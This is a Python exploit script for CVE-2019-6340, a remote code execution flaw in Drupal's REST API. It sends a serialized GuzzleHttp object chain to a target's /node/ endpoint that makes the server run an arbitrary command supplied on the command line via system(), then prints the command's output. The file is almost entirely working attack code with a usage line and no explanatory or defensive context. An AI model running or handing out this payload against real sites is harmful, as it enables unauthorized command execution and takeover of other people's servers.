import requests
import sys
import re
# url = "http://47.75.157.227"
url = sys.argv[1]
url_dir = "/node/"
vuln_url = url + url_dir
print("\n\nExample: python CVE-2019-6340.py url cmd\n")
print(">>>Vuln Url=%s" % vuln_url)
querystring = {"_format":"hal_json"}
cmd = sys.argv[2]
cmd_lenght = len(cmd)
payload = "{\r\n \"link\": [\r\n {\r\n \"value\": \"link\",\r\n \"options\": \"O:24:\\\"GuzzleHttp\\\\Psr7\\\\FnStream\\\":2:{s:33:\\\"\\u0000GuzzleHttp\\\\Psr7\\\\FnStream\\u0000methods\\\";a:1:{s:5:\\\"close\\\";a:2:{i:0;O:23:\\\"GuzzleHttp\\\\HandlerStack\\\":3:{s:32:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000handler\\\";s:%s:\\\"%s\\\";s:30:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000stack\\\";a:1:{i:0;a:1:{i:0;s:6:\\\"system\\\";}}s:31:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000cached\\\";b:0;}i:1;s:7:\\\"resolve\\\";}}s:9:\\\"_fn_close\\\";a:2:{i:0;r:4;i:1;s:7:\\\"resolve\\\";}}\"\r\n }\r\n ],\r\n \"_links\": {\r\n \"type\": {\r\n \"href\": \"http://172.17.0.15/rest/type/shortcut/default\"\r\n }\r\n }\r\n}" % (cmd_lenght,cmd)
proxies = {"http": "http://172.17.0.15:80","https": "http://172.17.0.15:80"}
headers = {
'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
'Connection': "close",
'Content-Type': "application/hal+json",
'Accept': "*/*",
'Cache-Control': "no-cache"
}
response = requests.request("POST", vuln_url, data=payload, headers=headers, proxies=proxies, params=querystring)
# print(response.text)
if response.status_code==403 and "u0027access" in response.text :
print("\n>>>>Exit CVE-2019-6340 RCE Vuln!\n")
m = re.findall('.*permissions."}(.*)',response.text,re.S)
print(m[0])
else:
print("No Vuln Exit!")